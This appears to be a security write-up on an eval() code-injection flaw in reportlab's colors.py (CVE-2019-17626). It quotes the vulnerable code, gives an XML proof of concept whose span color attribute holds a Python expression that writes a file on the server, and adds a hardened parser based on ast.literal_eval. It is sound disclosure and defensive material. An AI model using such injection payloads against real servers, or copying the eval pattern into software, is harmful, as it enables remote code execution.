I was looking at the source code of colors.py and found one instance where the
toColor class is evaluating the HTML color code without any validation. There is a CVE assigned for this issue as well: CVE-2019-17626.
    elif isStr(arg):
        arg = asNative(arg)
        C = cssParse(arg)
        if C: return C
        if arg in self.extraColorsNS: return self.extraColorsNS[arg]
        C = getAllNamedColors()
        s = arg.lower()
        if s in C: return C[s]
        try:
            return toColor(eval(arg))   # <--- Here
        except:
I wrote a PoC and verified the same with the following XML:
    <myroot>
      <label>hello-world</label>
      <row1>
        <html>
          <span color="open('/tmp/colors_poc.txt','wb').write('hello world!')">abcdef</span>
        </html>
      </row1>
    </myroot>
Suppose a web server is using reportlab to allow users to generate PDFs of XML docs (with code similar to the above). When an input like the above is used, the function in colors.py will be called, which will trigger the eval sink and hence create a colors_poc.txt file under the tmp directory of the server.
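A hardened replacement for that branch, as an added example that is not reportlab's own code or its actual fix: it accepts the same three shapes the original tries before reaching eval (hex/CSS form, a named colour, a numeric tuple) but parses each one explicitly and rejects everything else. The function and table names (safe_to_color, NAMED_COLORS, is_accepted) are constructed for this example, and the named-colour table stands in for getAllNamedColors().

```python
import ast
import re
from typing import Optional, Tuple

# Constructed for this example: a tiny named-colour table standing in for
# reportlab's getAllNamedColors(); values are (r, g, b) floats in [0, 1].
NAMED_COLORS = {
    "red": (1.0, 0.0, 0.0),
    "green": (0.0, 0.5, 0.0),
    "blue": (0.0, 0.0, 1.0),
    "black": (0.0, 0.0, 0.0),
    "white": (1.0, 1.0, 1.0),
}

_HEX_RE = re.compile(r"^#(?:[0-9a-fA-F]{3}|[0-9a-fA-F]{6})$")

RGB = Tuple[float, float, float]


def _parse_hex(arg: str) -> Optional[RGB]:
    """Parse #rgb or #rrggbb into 0..1 floats; None if the shape is wrong."""
    if not _HEX_RE.match(arg):
        return None
    digits = arg[1:]
    if len(digits) == 3:
        digits = "".join(ch * 2 for ch in digits)  # #f00 -> ff0000
    r, g, b = (int(digits[i:i + 2], 16) / 255.0 for i in (0, 2, 4))
    return (r, g, b)


def _parse_tuple(arg: str) -> Optional[RGB]:
    """Accept a literal '(r, g, b)' with each component in 0..1.

    ast.literal_eval only builds Python literals (numbers, strings, tuples,
    ...); it never performs calls or attribute access, so a string such as
    "open('/tmp/x','w')" raises ValueError instead of being executed.
    """
    try:
        value = ast.literal_eval(arg)
    except (ValueError, SyntaxError, TypeError, MemoryError, RecursionError):
        return None
    if (isinstance(value, tuple) and len(value) == 3
            and all(isinstance(c, (int, float)) and not isinstance(c, bool)
                    and 0.0 <= c <= 1.0 for c in value)):
        return tuple(float(c) for c in value)
    return None


def safe_to_color(arg: str) -> RGB:
    """Hypothetical replacement for the eval() branch of toColor.

    The lookup order mirrors the original (hex/CSS form, named colour,
    numeric tuple); anything that matches none of them is rejected with
    ValueError rather than handed to eval().
    """
    if not isinstance(arg, str) or len(arg) > 64:
        raise ValueError("color must be a short string")
    arg = arg.strip()
    color = _parse_hex(arg)
    if color is not None:
        return color
    named = NAMED_COLORS.get(arg.lower())
    if named is not None:
        return named
    color = _parse_tuple(arg)
    if color is not None:
        return color
    raise ValueError("unrecognised color value: %r" % arg)


def is_accepted(arg: str) -> bool:
    """True if safe_to_color accepts arg; handy for screening untrusted input."""
    try:
        safe_to_color(arg)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # The page's PoC attribute value is rejected; ordinary colours pass.
    print(is_accepted("open('/tmp/colors_poc.txt','wb').write('hello world!')"))  # False
    print(safe_to_color("#f00"), safe_to_color("Red"), safe_to_color("(0.5, 0.25, 1)"))
```

The design point is that no branch ever interprets the attribute as code: the hex form is matched by a fixed regular expression, the named form is a dictionary lookup, and the tuple form goes through ast.literal_eval, which by construction cannot call functions. Whatever fails all three is an error the caller can log, which also gives a simple detection hook for colour attributes that look like expressions rather than colours.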